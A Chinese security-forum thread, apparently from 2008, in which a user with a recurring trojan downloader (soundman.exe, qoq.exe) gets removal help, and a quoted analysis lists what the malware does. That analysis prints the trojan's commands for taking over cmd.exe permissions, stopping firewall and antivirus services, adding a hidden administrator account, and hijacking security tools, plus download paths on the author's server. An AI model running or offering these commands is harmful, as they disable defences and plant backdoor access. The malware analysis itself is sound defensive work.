瑞星卡卡安全论坛

瑞星杀不掉的病毒,每次开机都会出来

开机后杀就会跑出来.

好象是SOUNDMAN.EXE 和 QOQ.EXE, NOTEPDE.EXE, INTERNE.EXE

引起的,每次开机都会杀出十多个来.

它生成数个病毒文件在我的C盘里，主要为 notepde.exe , qoq.exe , SoundMan.exe, ssave.exe.
　　notepde.exe和 SoundMan.exe 这两个文件开机运行，无法关闭。

用户系统信息：Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)

把杀毒软件的杀毒日志发上来看看。

用windows清理助手清理一下系统。
windows清理助手下载页面：http://www.arswp.com/download.html
———————————————————————————————————————
然后使用System Repair Engineer扫描日志，将日志作为附件上传上来。
下载页面：http://www.kztechs.com/sreng/download.html
操作方法：
1、下载后解压缩，运行SREngPS.EXE；
2、如果无法打开尝试把SREngPS.EXE改名为123.com，并复制到c:\windows目录下运行；
3、依次点击【智能扫描】-【扫描】，耐心等待，扫描结束后点击【保存报告】；
4、选择保存路径，文件名保持默认，直接点击【保存】；
5、将日志文件SREngLOG.log作为附件上传到论坛，同时务必详细描述问题现象，如果有查杀不净的病毒务必提供病毒名和路径。
注意：扫描前请尽量关闭QQ、游戏、下载工具、媒体播放器等应用程序。

扫描中断,

发现问题: API HOOK

入口点错误: CreateProcessA  目的地地址: Ox01121FFD
入口点错误: CreateProcessB  目的地地址: Ox01122oE5

可以直接修复么?

说是新功能会导致系统崩溃

附件: SREngLOG.log

这步很重要：复制c:\winnt\system32\dllcache\explorer.exe粘贴到c:\winnt\路径下  替换该路径下的原文件；复制c:\winnt\system32\dllcache\ctfmon.exe文件粘贴到c:\winnt\system32\路径下 替换该路径下原文件

用XDelBox勾选抑制再生后删除以下文件：(XDelBox1.7支持奥运版下载)
使用说明：删除时复制所有要删除文件的路径，在待删除文件列表里点击右键选择从剪贴板导入不检查路径，导入后在要删除文件上点击右键，选择立刻重启删除，电脑会重启进入DOS界面进行删除操作。运行xdelbox前最好卸载所有可移动存储介质（包括U盘，MP3，手机存储卡等）。

c:\winnt\system32\cqavpw1.dll
c:\winnt\system32\ptshell.dll
c:\winnt\svchost.exe
c:\winnt\system32\dbhlp32.dll
c:\winnt\system32\hzjhznup.dll
c:\winnt\system32\tciocp64.dll
c:\winnt\system32\yuiabct.dll
c:\winnt\system32\explorer.exe
c:\winnt\system32\bhdcregc.exe
c:\winnt\system32\mxavpw0.dll
c:\winnt\hefxxxy.exe
c:\winnt\dionpis.exe
c:\winnt\yuiabct.exe
c:\winnt\ptshell.exe
c:\winnt\bshktpzn.exe
c:\winnt\dbhlp32.exe
c:\winnt\tciocp64.exe
c:\winnt\soundman.exe
c:\winnt\system32\soundman.exe
c:\winnt\system32\drivers\ssfs.sys
c:\docume~1\admini~1\locals~1\temp\tmp3.tmp
c:\docume~1\admini~1\locals~1\temp\tmp28.tmp
c:\docume~1\admini~1\locals~1\temp\tmp24.tmp
c:\winnt\system32\drivers\iuds.sys
c:\docume~1\admini~1\locals~1\temp\tmp2a.tmp
c:\docume~1\admini~1\locals~1\temp\tmp5.tmp
c:\winnt\system32\drivers\brpppoe.sys
c:\winnt\system32\drivers\npf.sys
c:\winnt\system32\qoq.exe
c:\winnt\qoq.exe
c:\winnt\system32\popo.exe
c:\winnt\popo.exe
c:\winnt\system32\vbb.exe
c:\winnt\system32\notepde.exe
c:\winnt\system32\ssave.exe
c:\winnt\notepde.exe
c:\winnt\ssave.exe

删除重启后使用SREng修复下面各项：

    启动项目 －－ 注册表之如下项删除：
[{3E387664-C799-4D62-B196-25776EF35C51}] 
[{D0B2F9F8-781C-43EA-AB99-58B9B528417E}] 
[hefxxxy] 
[dionpis] 
[yuiabct] 
[ptshell] 
[tbzschyk] 
[dbhlp32] 
[tciocp64] 
[SoundMan] 
[BHDCRegC] 
[IFEO[taskmgr.exe]] 

    启动项目 －－ 服务－－ 驱动程序之如下项禁用：
[ssfs / ssfs]   
[ptfs / ptfs]   
[ping / ping]   
[mnsf / mnsf]   
[iuds / iuds]   
[fmsq / fmsq]   
[drop / drop]   
[HelloNet PPPoE Device / BRPPPOE]   
[Netgroup Packet Filter / NPF]   


做完后 下载以下软件清理一次系统。。
清理系统临时文件和IE临时文件夹
http://www.atribune.org/public-beta/ATF-Cleaner.exe
用金山清理专家清理恶意软件
http://www.duba.net/zt/ksc/down.shtml
下载 windows清理助手清理一遍
http://www.arswp.com/download/arswp2/arswp2.zip


PS；楼主说瑞星杀不掉是指瑞星没检查出这些文件是病毒还是检查出来没能删除？？

谢谢楼上,是中了下面的刀,我说的是瑞星无法解决,每次杀完都会出来.如果不连INTERNET就没有关系,连上就又有了.

==========================================================================================

伪soundman.exe木马下载器（qoq.exe notepde.exe ）解决[ 作者：一把锈剑 | 更新日期:2008-4-9 09:16:45 | 阅读次数：253 ] 伪soundman.exe木马下载器解决
特征 qoq.exe notepde.exe popo.exe
1,删除旧版本的病毒然后释放以下文件文件
%windir%\soundman.exe（病毒主程序，木马下载器，图标和常见的soundman程序一样）
%windir%\system32\ttjj3.ini
%windir%\system32\interne.exe
%windir%\system32\qoq.exe （这个应该是PR端口扫描工具）
%windir%\system32\notepde.exe
引用:
2,通过进程枚举，关闭以下进程
shstat.exe
runiep.exe
ras.exe
MPG4C32.exe
imsins.exe
Iparmor.exe
360safe.exe
360tray.exe
kmailmon.exe
kavstart.exe
avp.exe
ccenter.exe
引用:
3,通过rtcShell运行cacls获取cmd.exe的权限，然后通过net stop sc 命令来关闭一些服务，并创建一个new1的管理员帐号
cacls.exe C:\winnt\system32\cmd.exe /e /t /g everyone:F
net stop wscsvc
net stop sharedaccess
sc config sharedaccess start= disabled
sc config wscsvc start= disabled
net stop KPfwSvc
net stop KWatchsvc
net stop McShield
net stop "Norton AntiVirus Server"

net user new1 12369 /add
net user new1 12369
net user new1 /active:yes
net localgroup administrators new1 /add
引用:
4.映象挟持kmailmon.exe，任务管理器等正常程序 ，其中挟持ctfmon来启动病毒程序soundman.exe
360Loader.exe
360Safe.exe
360tray.exe
IceSword
ctfmon.exe
Iparmor.exe
kmailmon.exe
iparmor.exe
ras
runiep
taskmgr.exe
引用:
5,尝试删除一些安全软件的启动项目，但是是否成功就不得而知了
hkey_local_machine\software\microsoft\windows\currentversion\run\360safetray
hkey_local_machine\software\microsoft\windows\currentversion\run\kavstart
hkey_current_user\software\microsoft\windows\currentversion\run\kavpfw
hkey_local_machine\software\microsoft\windows\currentversion\run\vptray
hkey_local_machine\software\microsoft\windows\currentversion\run\kav
hkey_local_machine\software\microsoft\windows\currentversion\run\runeip
hkey_local_machine\software\microsoft\windows\currentversion\run\ravtask
hkey_local_machine\software\microsoft\windows\currentversion\run\rfwmain
引用:
6,重命名ieprot.dll为iepret.dll，safemon.dll为safemes.dll 估计重启以后不能运行了 ^_^
引用:
7,生成1.inf通过rundll32.exe安装为服务Help and Support（注意这个本身是系统帮助支持中心但是被病毒替换了）
[Version]
Signature="$WINDOWS NT$"
[DefaultInstall.Services]
AddService=helpsvc,,My_AddService_Name
[My_AddService_Name]
DisplayName=Help and Support
Description=启用在此计算机上运行帮助和支持中心。如果停止服务，帮助和支持中心将不可用。如果禁用服务，任何直接依赖
于此服务的服务将无法启动。
ServiceType=0x10
StartType=2
ServiceBinary=%11%\interne.exe
ErrorControl=0
引用:
8.上传中招者的ip地址到病毒作者的服务器 下载盗号木马机器狗病毒等病毒文件，并通过端口扫描工具PR扫描局域网和IP段 135
端口是否有打开  保存在C:\Por.aed文件中^_^
/rc/zj/gx.jpg 貌似是自我更新啊
ssave.jpg   
notepde.jpg  加了一个未知壳，似乎是一个远程控制木马
/and/1.exe
.....
/and/11.exe(11-19链接失效了)
/and/19.exe

.....
/and/25.exe
www.newjian.com

这步很重要：复制c:\winnt\system32\dllcache\explorer.exe粘贴到c:\winnt\路径下  替换该路径下的原文件；复制c:\winnt\system32\dllcache\ctfmon.exe文件粘贴到c:\winnt\system32\路径下 替换该路径下原文件

=================

这步确实很重要, 因为无法COPY就做下去了，结果是电脑重启后,进不了桌面,内存报错, 系统挂掉了。

只能重装把 2000PF换成了XP.  看还会不会有问题。